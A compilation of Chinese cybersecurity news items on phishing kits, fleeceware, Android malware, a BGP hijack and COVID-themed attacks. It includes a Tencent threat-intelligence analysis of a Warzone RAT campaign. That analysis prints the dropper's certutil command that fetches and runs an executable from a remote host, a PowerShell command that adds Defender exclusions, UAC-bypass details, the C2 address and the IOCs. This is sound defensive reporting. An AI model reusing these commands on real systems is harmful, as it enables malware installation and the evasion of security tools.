从事网络安全研究的Group-IB表示，该公司通过分析汇总已知的网络犯罪市场和黑客论坛上发布的交易数据，2019年网络犯罪黑市上出售的网络钓鱼套件的平均价格从2018年录得的122美元飙升至去年的304美元。 尽管网络钓鱼工具包的卖家数量（增长了120%）和网络钓鱼工具包广告的数量（2019年增长了一倍）双双增加，但由于“供需两旺”，钓鱼工具包的价格继续快速上扬。 在Group-IB在2019年识别和跟踪的16200个钓鱼套件中，伪造亚马逊、谷歌、Instagram、Office 365和PayPal的登录页面的手段最为常见。 亚马逊和PayPal是已知的最常用的网络钓鱼行动的目标，因为访问这两个账户可以让黑客直接利用受害者的资金进行欺诈性交易。 访问谷歌和Office 365账户往往会导致企业网络遭到破坏，这也解释了为什么大多数网络钓鱼工具包都支持针对这两项服务的攻击。 另外一个有趣的现象是黑客也热爱“网红”，围绕着黑客入侵和出售高用户数的Instagram账号，这里又形成了一个网络犯罪社区。 这种交易大多发生在一个名为OGUsers的论坛上，而这似乎也吸引了网络钓鱼套件的卖家加入到这个网站上，作为可以购买钓鱼套件的三大网络犯罪论坛之一，它仅次于Exploit和Crimenetwork。 2019年网络钓鱼工具包价格上涨有一系列原因。其中最主要的一个原因是，近年来随着浏览器越来越难被黑客入侵，这种网络钓鱼懒人工具包的效率下降了。这反过来推动了越来越多的黑客拥抱基于电子邮件的攻击，将其作为入侵组织的主要手段。 如今，网络犯罪生态系统中的很大一部分是由基于电子邮件的攻击所驱动的。虽然大多数电子邮件攻击主要集中在传递受恶意软件感染的文件或引诱用户到可以下载恶意软件的网站上，但这些攻击中也有很大一部分是网络钓鱼。 网络钓鱼，指的是引诱用户到一个托管虚假登录页面的网页，收集登录信息并引诱受害人做出泄露隐私数据的动作从而从中牟利。制作精良的网络钓鱼工具包会附带大量的钓鱼模板和功能，可以绕过电子邮件安全系统。 此外，还有其他原因。比如说，买家也在从过去的错误中汲取教训。廉价或免费的钓鱼套件往往含有后门，所以现在大多数买家已经学会了去购买高价值的产品，而不是免费的工具，这无形中增加了需求量，钓鱼套件的价格也随之水涨船高。 网络安全领域的一个公理是：黑客工具的价格与合法产品的安全性间接成正比。黑客工具的价格越高，合法产品越难被黑客入侵。换句话说，2019年网络钓鱼工具价格上涨是一个很好的消息，因为这意味着电子邮件安全系统在检测攻击方面的能力越来越强。   （稿源：cnBeta，封面源自网络。）

如果你以为没有什么比破坏计算机的恶意软件入侵更可怕，那么请你再想一想银行账户直接被提取的糟糕程度。Android和iOS上的几十个“吸费软件”应用现在能通过使用诱饵和交换策略，利用手机应用商店的试用机制，向用户收取巨额费用。原本购买时看似划算的事情，即使你在试用期结束前卸载了应用，也会很快变成一个昂贵的错误。 在本周发布的一份报告中，英国安全公司Sophos透露，有超过350万iOS用户安装了 “吸费软件”，这是一种相对较新的网络诈骗。 这些应用大多以图像编辑器、二维码和条码扫描器、图像和视频过滤应用以及与星座和算命相关的东西的形式出现。 它们的工作方式是，滥用试用软件的形式在移动应用商店上散播，本质上是向用户收取高额费用。当你下载一款这种盗版应用时，你可以在短时间内访问它的所有功能，一旦试用期满，该应用就会尝试获得许可向你收费。而由于大多数这些应用一开始并没有提供什么价值，所以很多人最终都会卸载掉这个应用，这时，他们就会认为不再收费。 某些应用的开发者利用了应用商店的政策，让他们在你卸载之前要求你做更多的许可工作。这让他们仍然可以向你的账户收费，通常是一次性支付少量的费用或廉价的月费，但这种吸费软件应用则更进一步，要求你支付高额的费用，通常是数百美元。 去年，Sophos发现了50多个被安装了不少于6亿次“吸费软件”，随后谷歌在得知这些应用存在后，将其全部清理掉了，但新的应用却依然不断冒出，在安装量上能够与一些最成功的合法应用相媲美。 Sophos示，苹果的App Store目前至少有32款盗版吸费应用，其操作手法与Play Store上的应用相同。只要3天的7天试用期一结束，这些应用就会收取9美元/周或30美元/月的费用，这两项费用加起来可以高达468美元或360美元/年。 这些App的下载量往往在50万到100万之间，特别是其中一款名为 “十二生肖大师Plus “的App，更是跻身于总收入最高的App之列，不知情的用户看到这些数字，就会以为这些应用的受欢迎程度就是衡量其价值的标准，于是就会下载。 Sophos的恶意软件分析师Jagadeesh Chandraiah指出，”应用发布商也有能力通过发布新的盗版应用和订阅政策，或者通过改变应用在App Store中的资料，将之前免费的应用转化为盗版应用，尽管苹果开发者政策禁止这种行为。” 避免上当受骗的最好方法是仔细检查描述页面和评论，同时养成每次卸载应用时都要检查账户是否有订阅的习惯。下面是Sophos发现的全部盗版软件应用列表：   （稿源：cnBeta，封面源自网络。）

安全研究人员再次对难以删除的恶意程序 xHelper 发出警告。过去一年，xHelper 主要通过第三方应用商店在俄罗斯、欧洲和西南亚运行 Android 6 和 7 的设备上传播。一旦安装它就难以卸载了，即使设备恢复到出厂设置也无法清除它。 当它伪装成合法应用安装到设备上之后，它会通过互联网下载一个木马收集信息，然后下载另一个木马，再利用一组漏洞利用代码获得设备的 root 权限。 这组漏洞利用代码主要针对中国制造的  Android 6 和 7 的设备。获得 root 权限之后，恶意程序会挂载到启用写访问的操作系统分区，改变 mount() 函数代码，防止其遭到删除。 要彻底删除 xHelper 可能需要完全抹掉设备上的文件，重新安装一个干净的版本，恢复出厂设置无法消灭它。   （稿源：cnBeta，封面源自网络。）

本周早些时候，全球最大的200多家内容传输网络（CDN）和云主机提供商的流量被怀疑通过俄罗斯国有电信运营商Rostelecom转发。该事件影响了200多个网络的8800多条互联网流量路线。受影响的公司都是云和CDN市场的知名企业，包括Google、Amazon、Facebook、Akamai、Cloudflare、GoDaddy、Digital Ocean、Joyent、LeaseWeb、Hetzner和Linode等公司。 受害网络的完整名单可以参考这个Twitter信息流地址： https://twitter.com/search?q=AS12389%20(from%3Abgpstream)%20until%3A2020-04-07%20since%3A2020-04-01&src=typed_query 这次事件是一个典型的 “BGP劫持”，BGP是边界网关协议的缩写，BGP是全球互联网网络之间的互联网流量路由系统，从设计上，整个系统就非常脆弱，因为任何一个参与网络都可以简单地 “撒谎”式地发布一个BGP路由通告，例如声称 “Facebook的服务器”在他们的网络上，随后所有的互联网实体都会把它当作合法的目标，从而将Facebook的流量全部发送到劫持者的服务器上。 过去，在HTTPS被广泛用于加密流量之前，BGP劫持允许攻击者进行中间人（MitM）攻击，拦截和改变互联网流量。 如今，BGP劫持仍然是危险的，因为它可以让劫持者记录流量，并试图在以后的日子里对流量进行分析和解密，现时由于密码学科学的进步，用于保护流量的加密技术已经被削弱。 自90年代中期以来，BGP劫持一直是互联网主干网的一个问题，多年来通信从业者一直在努力加强BGP协议的安全性，自此产生了ROV、RPKI，以及最近的MANRS等项目。然而，在采用这些新协议方面的进展一直很缓慢，BGP劫持事件仍时有发生。 专家们过去曾多次指出，并非所有的BGP劫持都是恶意的。大多数事件可能是人为操作者误输入了一个ASN(自主系统号，即互联网实体的识别代码)，意外劫持了该公司的互联网流量。 然而，一些实体的BGP劫持事件的幕后黑手仍然时有发生，许多专家在事件的背后都被贴上了可疑的标签，说明这些事件不仅仅是意外。 Rostelecom（AS12389）虽然没有像之前部分国家的运营商那样直接故意地参与到BGP劫持事件中，但其背后也有很多类似的可疑事件。 上一次抢占头条的Rostelecom重大劫持事件发生在2017年，当时该电信公司劫持了包括Visa、Mastercard、汇丰银行等全球最大的金融实体的BGP路由。 这一次，通信业内还没有定论。BGPMon的创始人Andree Toonk正在给予俄罗斯电信公司以怀疑的理由。Toont在Twitter上表示，他认为这次 “劫持 “事件发生的原因是俄罗斯电信内部的流量整形系统可能在公共互联网上不小心暴露了错误的BGP路由，而不是俄罗斯电信内部网络的整体问题。 不幸的是，这个小小的失误被Rostelecom的上游供应商拿着新公布的BGP路由在互联网上重新传播，从而将BGP劫持事件在几秒钟内放大了，这让这个小错误变得更加严重。 但是，过去很多互联网专家也曾指出，故意的BGP劫持是有可能出现的，因为没有人能够分辨出来差异。在国家控制的电信实体中发生的BGP劫持一向被视为可疑-主要是由于政治因素，而不是技术原因。   (稿源：cnBeta，封面源自网络。）    

安全研究人员发现了至少五种 COVID-19 主题的恶意程序，其中四种设计是去破坏被感染的计算机，删除文件或覆写主引导记录，还有一种可能只是测试或恶作剧。第一种能覆写主引导的新冠恶意程序是 MalwareHunterTeam 发现的，名字就叫 COVID-19.exe；第二种则伪装成勒索软件，但其主要功能是窃取密码。 MalwareHunterTeam 还报告了数据删除的新冠主题恶意程序，其中一种使用中文文件名，可能设计针对中文用户，还不清楚这种恶意程序是否广泛传播或只是测试。   （稿源：solidot，封面源自网络。）

感谢腾讯御见威胁情报中心来稿！ 原文：https://mp.weixin.qq.com/s/TRY4-1aUf5gTLHOWQ7PWuQ   一、背景 腾讯安全威胁情报中心检测到有黑客利用新冠肺炎(Covid-19)疫情相关的诱饵文档攻击外贸行业。黑客伪造美国疾病控制和预防中心（CDC）作为发件人，投递附带Office公式编辑器漏洞的文档至目标邮箱，收件人在存在Office公式编辑器漏洞（CVE-2017-11882）的电脑上打开文档，就可能触发漏洞下载商业远控木马Warzone RAT。 Warzone RAT是在网络上公开销售的商业木马软件，具有密码采集、远程执行任意程序、键盘记录、远程桌面控制、上传下载文件、远程打开摄像头等多种远程控制功能，并且还可以在包括Win10在内的Windows系统上进行特权提升。 根据腾讯安全威胁情报中心数据，该病毒从3月23日开始传播，目前已有广东、上海、湖北等地的外贸企业受到黑客钓鱼邮件的攻击。腾讯安全专家提醒企业用户小心处理不明邮件，建议网管使用腾讯T-Sec高级威胁检测系统检测黑客攻击，客户端可采用腾讯T-Sec终端安全管理系统或腾讯电脑管家拦截病毒。 二、样本分析 攻击邮件伪装成美国疾病控制和预防中心(cdc.gov)发送关于Covid-19的重要更新通知，将漏洞利用的DOC Word文件命名为COVID-19 – nCoV – Special Update.doc，引导收件人打开查看。 此时如果用户在没有安全防护软件，且使用没有修复CVE-2017-11882漏洞的Office打开此文档，就会触发漏洞中的恶意代码，然后恶意代码从C2服务器下载并运行木马病毒。文档下载木马的命令为： CmD /C cErTuTiL -uRlCAchE -sPlIT -f http[:]//getegroup.com/file.exe %TMP%\\1.exe&start %TMP%\\1.exe File.exe外壳程序采样C#编写，代码经过高度混淆，运行时经过两次解密在内存中Invoke执行最终的PE文件，该PE通过分析可确认为商业远控木马Warzone RAT。 Warzone RAT最早2018年在warzone[.]io上公开出现，目前在warzone[.]pw上提供销售。Warzone RAT商业木马软件具有以下功能： 可通过VNC进行远程桌面控制 可通过RDPWrap进行隐藏的远程桌面控制 特权升级（包括最新的Win10系统） 远程开启摄像头 盗取浏览器密码（Chrome，Firefox，IE，Edge，Outlook，Thunderbird，Foxmail） 下载、执行任意文件 离线键盘记录器或实时键盘记录器 远程shell 文件管理 进程管理 反向连接 三、窃密 Warzone RAT木马窃密功能包含窃取各类浏览器登陆使用的账号密码以及邮件客户端保存的账号信息。 获取保存在Chrome中的账号密码信息。 获取保存在IE浏览器中的账号密码信息。 获取OutLook邮箱中的账号密码信息。 获取Thunderbird邮箱中的账号密码信息。 获取Firefo浏览器中的账号密码信息。 四、特权提升 如果Warzone RAT以提升的特权运行，则会使用以下PowerShell命令将指定路径添加到Windows Defender的排除项中： powershell Add-MpPreference -ExclusionPath 对于Windows 10以下的版本，使用存储在其资源WM_DSP中的模块进行UAC绕过。 该模块代码最终使用pkgmgr.exe以更高的特权加载恶意程序。 对于Windows 10则利用sdclt.exe 的权限自动提升功能，该功能在Windows备份和还原机制的上下文中使用。 五、远程控制 解密出C2地址：phantom101.duckdns.org:5200，与该地址建立连接成为受控机，使电脑完全被黑客控制。 与服务器进行TCP通信，传输数据使用RC4加密算法加密，密钥为”warzone160”。 与控制端通信的部分协议命令和含义如下： C&C 操作 2 枚举进程信息 4 枚举磁盘信息 6 枚举文件 8 读取文件 10 删除文件 12 杀死进程 14 远程Shell 20 开启摄像头 26 卸载木马 28 上传文件 32 从浏览器获取密码 34 下载并执行程序 36 键盘记录(在线) 38 键盘记录(离线) 40 RDP 42 建立反向连接 44 反向连接断开 48 Socket设置 58 执行文件 60 读取日志 六、安全建议 1、建议不要打开不明来源的邮件附件，对于邮件附件中的文件要谨慎运行，如发现有脚本或其他可执行文件可先使用杀毒软件进行扫描； 2、安装CVE-2017-11882漏洞补丁：https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882 3、 禁用公式编辑器组件: a) 可以通过运行如下命令禁用Office编辑器： reg add"HKLMSOFTWAREMicrosoftOfficeCommonCOMCompatibility{0002CE02-0000-0000-C000-0000 b) 对于 x64 OS 中的32位Microsoft Office 软件包, 运行以下命令: reg add"HKLMSOFTWAREWow6432NodeMicrosoftOfficeCommonCOM Compatibility{0002CE02-0000-0000-C000-000000000046}"/v "Compatibility Flags" /t REG_DWORD /d 0x400 4、企业网管，可以设置拦截以下邮件发件人的邮件。 de.iana@aol.com shenzhen@faithfulinc.com 5、推荐企业用户部署腾讯T-Sec高级威胁检测系统（腾讯御界）对黑客攻击行为进行检测。 腾讯T-Sec高级威胁检测系统，是基于腾讯安全能力、依托腾讯在云和端的海量数据，研发出的独特威胁情报和恶意检测模型系统，该系统可及时有效检测黑客对企业网络的各种入侵渗透攻击风险。参考链接：https://cloud.tencent.com/product/nta 6、企业终端系统保护 终端电脑可部署腾讯T-Sec终端安全管理系统（御点）拦截病毒木马攻击，更多信息参考链接：https://s.tencent.com/product/yd/index.html。 IOCs C&C phantom101.duckdns.org:5200 MD5 76387fb419cebcfb4b2b42e6dc544e8b 55b75cf1235c3345a62f79d8c824c571 030e95d974c5026499ca159055b2dfa6 URL http://getegroup.com/file.exe 参考链接 https://www.freebuf.com/column/156458.html https://research.checkpoint.com/2020/warzone-behind-the-enemy-lines/

安全大厂卡巴斯基刚刚公布了两款危害 Android 设备的新型恶意软件，警告其可能控制用户的 Facebook 等社交媒体账户。受感染的机器会向攻击者敞开用户社交帐户的访问权限，并被广泛应用于垃圾邮件和网络钓鱼等活动。更糟糕的是，两款恶意软件会协同工作，并逐步对用户设备展开破坏。 第一款恶意软件会尝试在受感染的 Android 设备上取得 root 权限，使得网络犯罪分子能够提取 Facebook 的 cookie，并将之上传到受控服务器。 卡巴斯基指出，通常情况下，仅拥有账号 ID 是不足以控制用户账户的。网站已经采取了一些安全措施，以阻止可疑的登陆尝试。 第二款 Android 木马可在受感染的设备上设置代理服务器，使得攻击者能够绕过安全措施，从而实现对设备的几乎完全控制，以染指受害者的社交媒体账户。 庆幸的是，只有少数人受到 Cookiethief 的威胁。但估计过不了多久，类似的攻击方法会变得越来越普遍。 卡巴斯基恶意软件分析师 Igor Golovin 表示：通过结合这两种方法，攻击者可在不引起受害者明显怀疑的情况下达成对 cookie 信息的窃取和账户的控制。 尽管这是一个相对较新的威胁，迄今为止的受害者只有 1000 人左右，但这一数字仍可能进一步增长，尤其是网站很难检测到行为的异常。 尽管我们在日常的网页浏览过程中不怎么关注，但 cookie 信息其实无处不在。作为处理个人信息的一种方法，其旨在收集线上的有关数据。 最后，卡巴斯基建议用户应养成良好的习惯，始终通过受信任的来源下载应用、阻止第三方 cookie 访问并定期清除，以充分抵御此类攻击。   (稿源：cnBeta，封面源自网络。）

Cybereason 的 Amit Serper 在一轮新的恶意软件活动中发现，通过重新打包被感染的恶意软件，黑客本身也成为了其他黑客的攻击目标。此前多年，黑客普遍在利用现有的工具来实施网络犯罪行动，比如从数据库中窃取数据、通过破解 / 注册码生成器来解锁试用软件的完整版等。 然而功能强大的远程工具本身，也成为了某些别有用心者的目标。通过注入木马，制作者可在工具打开后获得对目标计算机的完全访问权限。 Amit Serper 表示，攻击者倾向于在黑客论坛上发布经其重新打包的工具来‘诱骗’其他黑客，甚至为已经遭到恶意软件破坏的系统进一步打开后门。 如果黑客利用这些木马工具对某企业发动了网络攻击（包括从事安全研究工作的白帽），那重新打包攻击工具的那个人，也能够访问到受害者的敏感数据。 据悉，这些迄今未知的攻击者，正在使用功能强大的 njRat 木马来注入代码并重新打包黑客工具，攻击者可完全访问目标桌面、文件、木马、甚至网络摄像头和麦克风。 该木马至少可追溯到 2013 年，当时它经常被用于对付中东地区的目标，多通过网络钓鱼电子邮件和受感染的闪存驱动器来传播。 然而最近，黑客已将恶意软件注入到休眠或不安全的网站中，以逃避检测。以最近的攻击为例，可知幕后黑手正在使用相同的黑客技术来托管 njRat 。 Amit Serper 指出，攻击者破坏了不知谁拥有的几个网站，以托管数百个 njRat 恶意软件样本、以及攻击者用于控制的基础结构。 更糟的是，这种将 njRat 木马注入黑客工具的过程几乎每天都在发生，意味着它可能是在无人直接干预的情况下自动完成的。 至于幕后主使者和发起攻击的确切原因，目前暂不得而知。   （稿源：cnBeta，封面源自网络。）

上月，总部位于阿姆斯特丹的网络安全公司ThreatFabric发现了名为Cerberus的恶意程序。它是有史以来首款能够成功窃取Google Authenticator应用程序生成的2FA（两因素身份验证）代码功能的Android恶意软件。该软件目前正在开发过程中，目前没有证据表明已用于实际攻击。 研究人员表示，该恶意程序混合了银行木马和远程访问木马（RAT）特性。一旦Android用户被感染，黑客便会使用该恶意软件的银行木马功能来窃取移动银行应用程序的帐号凭据。 ThreatFabric的报告指出，远程访问特洛伊木马（Cerberus）是在6月底首次发现的，它取代了Anubis木马，并逐渐成为一种主要的恶意软件即服务产品。 报告指出，Cerberus在2020年1月中旬进行了更新，新版本引入了从Google Authenticator窃取2FA令牌以及设备屏幕锁定PIN码和滑动方式的功能。 即使用户账户受到2FA（Google Authenticator生成）保护，恶意程序Cerberus可以通过RAT功能手动连接到用户设备。然后，黑客将打开Authenticator应用程序，生成一次性密码，截取这些代码的屏幕截图，然后访问该用户的帐户。 安全团队表示：“启用窃取设备的屏幕锁定凭据（PIN和锁定模式）的功能由一个简单的覆盖层提供支持，该覆盖层将要求受害者解锁设备。从RAT的实现中，我们可以得出结论，建立此屏幕锁定凭据盗窃是为了使参与者能够远程解锁设备，以便在受害者不使用设备时进行欺诈。这再次显示了罪犯创造成功所需的正确工具的创造力。” 在本周发表的研究中，来自Nightwatch Cybersecurity的研究人员深入研究了导致这种攻击的根本原因，即Authenticator应用程序首先允许对其内容进行屏幕截图。 Android操作系统允许应用程序阻止其他应用程序截屏其内容，从而保护其用户。这是通过在应用程序的配置中添加“ FLAG_SECURE”选项来完成的。Google并未将此标记添加到Authenticator的应用中，尽管该应用通常处理一些非常敏感的内容。 Nightwatch研究人员表示，谷歌早在2014年的10月就收到了相关的问题报告，当时有用户在GitHub上注意到这个错误配置。2017年，Nightwatch在2017年的时候又向谷歌的安全团队报告了相同的问题，此外还发现微软的Authenticator同样存在能够截图问题。   （稿源：cnBeta，封面源自网络。）

网络诈骗者往往会抓住时下热点，欺骗用户点击链接或者下载含有恶意代码的软件。例如在过去几个月中，就有诈骗者利用澳大利亚山火进行虚假众筹，以及出售假冒的科比·布莱恩特纪念品等等。时下最热门的话题莫过于新型冠状病毒，因此诈骗者利用该新闻进行传播恶意程序就没有奇怪的了。 这些恶意行为最早是由CheckPoint发现的，这些网络诈骗者发送了当地或者全球世界卫生组织的官方文件。如果用户打开这些看上去合法的文件，那么计算机就会被感染。 根据初步调查这种恶意行为在日本最为猖獗，诈骗者伪装日本残疾人福利服务提供商分发了携带有Emotet（连续4个月位排行第4的恶意软件）的电子邮件附件。这些电子邮件似乎正在报告感染在日本几个城市中蔓延的位置，这鼓励受害者打开文档，如果打开该文档，则尝试在其计算机上下载Emotet。 也有报道称，诈骗者正在使用带有恶意链接的网络钓鱼电子邮件，乍一看似乎将用户定向到疾病控制与预防中心（CDC）的官方网站，而实际上他们被引导到鼓励用户访问的页面他们输入他们的电子邮件帐号密码。   (稿源：cnBeta，封面源自网络。）